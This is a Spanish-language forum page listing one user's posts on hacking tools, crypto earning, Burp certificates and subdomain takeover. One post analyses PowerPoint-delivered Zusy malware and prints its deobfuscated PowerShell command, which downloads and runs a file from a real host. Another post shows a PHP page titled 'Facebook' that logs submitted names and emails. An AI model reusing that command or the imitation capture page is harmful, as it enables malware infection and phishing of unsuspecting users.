Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - xhc1

#21
Concuerdo, con animanegra wireshark es la mejor opcion como bien dices no lo necesitas para hacer cosas fuera de lugar o almenos nada realmente significativo, short es un duro para la seguridad complemenado con algo de programacion pyhon usando scapy es algo muy interesane, si sabes algo de pyhon aprovecha tu situacion para aprender un poco mas... Saludos!!1
#22
Hola!! nunca le he parado mucho a esas paginas de publicidad!! que a cambio te dan 0.0001$por ver cada una de las pg de publicidad, quiero saber si existe otros metodos un poco mas no se "menos ladilloso" quiero almenos conseguir 10$ de este modo primero para no gastar de mi dinero y segundo par invertir en criptomonedas tengo entendido que necesito alguito para comprar en el negocio de exchange, hablo de poloniex aunque hay otros parecidos, entonces que pagina o metodo para conseguir sea usd o criptomonedas sean bitcoins o altcoins para poder invertir luego...

Alguien con experiencia que me guie!! ;D
#23
Si tendre cuidado en eso
#24

A diferencia de otros archivos de Microsoft Office que contienen macros maliciosas, el documento que ha sido descubierto utiliza comandos PowerShell, y simplemente con pasar por encima el ratón de un enlace (mouse hover) se activa la secuencia del payload.


Una nueva variante de un malware llamado "Zusy" se ha encontrado en la propagación como un archivo de PowerPoint adjunto a correos electrónicos de spam con títulos como "Orden de Compra # 130527" y "Confirmación". Es interesante porque no requiere que el usuario habilite las macros para ejecutarse.




La mayoría del malware de Office se basa en que los usuarios activan las macros para descargar alguna carga útil ejecutable que hace la mayoría de las cosas maliciosas, pero este malware utiliza la función del programa externo en su lugar.

Este ataque explota una característica legítima de PowerPoint. Colocar el cursor sobre un hipervínculo en una presentación puede desencadenar macros, llevar al usuario a la siguiente diapositiva, reproducir un sonido, abrir una página web o abrir una aplicación externa. La mayoría de los ataques malware basados en documentos a través de PowerPoint usarían macros para descargar la carga maliciosa, pero ahora que Office bloquea macros por defecto y más usuarios saben que no las habilitan, los atacantes están buscando otras formas de engañar a los usuarios.

Cuando se abre el archivo malicioso de PowerPoint, muestra una pantalla con un solo enlace que dice "Cargando ... espere":

En caso de que la víctima pase el cursor del ratón por encima de este link se ejecutará un código malicioso que intentará conectarse a una página web para descargar malware en el ordenador. Por tanto, ni siquiera es necesario hacer clic en el enlace, un detalle que ha llamado la atención de los investigadores de seguridad.



    <a:hlinkMouseOver r:id="rId2" action="No tienes permitido ver los links. Registrarse o Entrar a mi cuenta>


En efecto se puede ejecutar un comando al pasar por encima de un enlace en un PowerPoint:

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


    ppaction://protocol 


Para usuarios con vista protegida deshabilitada o cuando los usuarios ignoran la ventana emergente y permiten que el código se ejecute, el código malicioso de PowerShell intentará conectarse a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y descargar otro archivo.

Y el comando desofuscado en PowerShell hace que visite la URL maligna (hxxp) que descarga un fichero .JSE
Esto indica que es un archivo JScript Encoded codificado que es ejecutado por WScript para descagar un fichero EXE

    powershell -NoP -NonI -W Hidden -Exec Bypass

     "IEX (New-Object System.Net.WebClient).

    DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\"$env:temp\ii.jse\");

     Invoke-Item \"$env:temp\ii.jse\""


Si el usuario tiene habilitada la función Vista protegida, que de acuerdo con Microsoft está activada por defecto tanto en Windows Defender como en Office 365, PowerPoint detendrá el ataque y mostrará un aviso de seguridad.

Algunos análisis completos y muestras del malware en inglés:

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Algunos expertos de seguridad aseguran que PowerPoint Viewer, al no ser compatible con la ejecución de programas externos, no está afectado por este fallo.

Fuentes:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#25
Oye muy bien, que necesito para hacer de mi vbs un stand alone, la unica libreria que necesita es vbscript.dll?
#26
HOla!!
estoy analisando un poco las cosas y renovando otras, que piensan vbs es el que he usado para tal tarea haciendo de estos multiples tareas lo malo esque aveses me arroja error con algunas maquinas, que consideran que otro lenguaje es bueno claro esta con windows
#27
Off Topic / Re:Feliz cumpleaños Blackdrake!
Junio 06, 2017, 12:06:11 PM
Feli cumpleaños Pana, gracias por tus aportes, que tengas vida y salud. Siempre..
#28
exacto creo que si buscas afectividad comprender los script y usar la consola es lo que se busca,
#29
Citarhabia hecho un tutorial de eso hace mucho: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta espero que te sirva, saludos

GRACIAS!! HERMANO, de pana el unico que entendio el problema, gracias a tu pagina me pude guiar, el problema era que no activava ZAPROXY entonces no me entraba en la pagina de http//:burp, ademas aprendi a definir HSTS, saludos!!
#30
Gracias, este tema ya lo pueden cerrar, lo que hize fue lo siguiente: arme con python una funcion que cuando alguien asignara su nombre y email, al fichero. Python lo almacenara en una base de datos sqlite3, de esta manera me salte esa falla que al fin de cuentas no se que era pero tampoco me voy a dejar ganar xD. Si quieren hago un post respecto al ichero python, claro si estan interesados!!

Saludos!!
#31
 :o
Amigo puedes ser un poco mas tecnico al respecto para poder entender bien
CitarSi no funciona con la dirección "burp", prueba directamente con la dirección de tu proxy, por ejemplo, 127.0.0.1:8080 o la que tengas configurada, debería de cargar correctamente.
Te refires exactamente aque? la configuracion por defecto trabajando con zaproxy y burp es 127.0.0.1;8080 como dices pero de hay necesito el certificado, ya que la intercepcion me arroja error, o esque entiendo mal!! lo que me quieres decir... necesito burp para una prueba muy importante :( AYUDAAA!!!
#32
por favor el fichero es
Citarcocert.der
, si lo tienen serian tan amables de pasarmelo :(
#33
Ufs hace tiempo lo tenia y podia hacer mi pruebas,en fin esta ves retome mis pruebas e investigaciones y me encuentro que cuando voy a:
Citarhttp//:burp
me aparese otra pagina, en fin conocen otro metodo no oficial para tener el certificado y poder  trabajar con https.

Tambien si desconosco otra via para poder deshabilitar la funcionalidad del browers que claro bloquea el uso de esta herramienta. esto abierto a sugerencias!!

De ante mano gracias*
Saludos!!
#34
nada ya habia dado permisos, hasta lo volvi hacer :(
#35
hola!

tengo este problema que me arroja mi codigo de php, quiero guardar los datos obtenidos en un fichero, pero parece increible como me arroja ese error no entiendo, me pueden ayudar :(

El error es el siguiente
Citar
Warning: fopen(/home/xc/resource.txt): failed to open stream: Permission denied in /var/www/html/AAa/env.php on line 21

Warning: fwrite() expects parameter 1 to be resource, boolean given in /var/www/html/AAa/env.php on line 22

Warning: fclose() expects parameter 1 to be resource, boolean given in /var/www/html/AAa/env.php on line 23

Código: php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>Facebook</title>
</head>

<body>
<?php

$Nombre = $_GET['nombre'];
$Email = $_GET['email'];

if ($Nombre=='' || $Email==''){

echo "<script>alert('Los campos marcados con * son obligatorios');location.href ='javascript:history.back()';</script>";

}else{
    $cv = fopen("/home/xhc1/resource.txt", "a");
    #coloco resource.txt , tambien coloco var/www/html/resource.txt y nada -.- detesto php -.-
    fwrite($cv, "$Nombre");
    fclose($cv);


   
}

?>
</body>
</html>


Gracias de ante mano soy muy torpe aveses con php
#36
Hola!!
Hace dias he retomado un proyecto usando python en el cual quiero crear una especie de programa con mis exploits favoritos y que mas uso, algo liviano, la parte complicada aqui esque desconosco las bibliotecas que me puedan ayudar a tal tarea, alguna referencia por donde comenzar
#37
burp suite, te lo facilita tambien y un borrado en el propio navegador
#38
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Aquí tienes alguna de las técnicas para eso No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
En cuanto a las herramientas para buscar subdomains puedes buscar en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta hay cientos de ellas. Una muy buena es 'Sublist3r' No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
O bien, siempre puedes utilizar las técnicas manuales (Google, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, etc.)

Saludos!
gracias amigo!
#39
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Yendo por partes con la pregunta.

En un caso general el dominio es el eslabon principal por ejemplo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hasta alli, es un solo eslabón; luego tienes los sub-dominios alojados en mencionado dominio (servidor/vps), por ejemplo:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y así como ellos, encontrarás miles.

De alli inicia el proceso de investigar los sub-dominios de un dominio.
Las vulnerabilidades por lo general no son dirigidas a dominios o sub-dominios; si no, a un servicio alojado en alguno de ellos.

Un saludo !
Bueno hago la pregunta porque hay unas documentaciones por hay que no selogran entender del todo, como llevo poco tiempo en hackerone, entiendo como funciona los dominios pero tienes razon depende de un servicio mal configurado tal ves o que no este en uso, pero me sigo explicando como llegaria a detectar determinado servicio que no este en uso coloco un ejemplo:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
entonces usa una DNS apuntando hacia Amazon S3 para el almacenamiento de archivos, pero sin
un recipiente (bucket) de Amazon S3 que realmente exista. (coloco este ejemplo plasmado ya en un libro)
Ahora la pregunta es:
1-)como se yo que tiene bucket existente // bucket: conjunto de datos
2-)como alguien mal intensionado se aprovecharia de direccion generada para alojar un sitio web malicioso

Gracias de ante mano  :D
#40
Me pueden facilitar algunas guias para entender como funciona, ademas que herramientas por lo general se usan para descubrir subdominios  si valen la pena, bueno creo que es lo de menos quisiera entender como esque alguien se ase con el dominio del subdominio abandonado por asi decirlo creo!!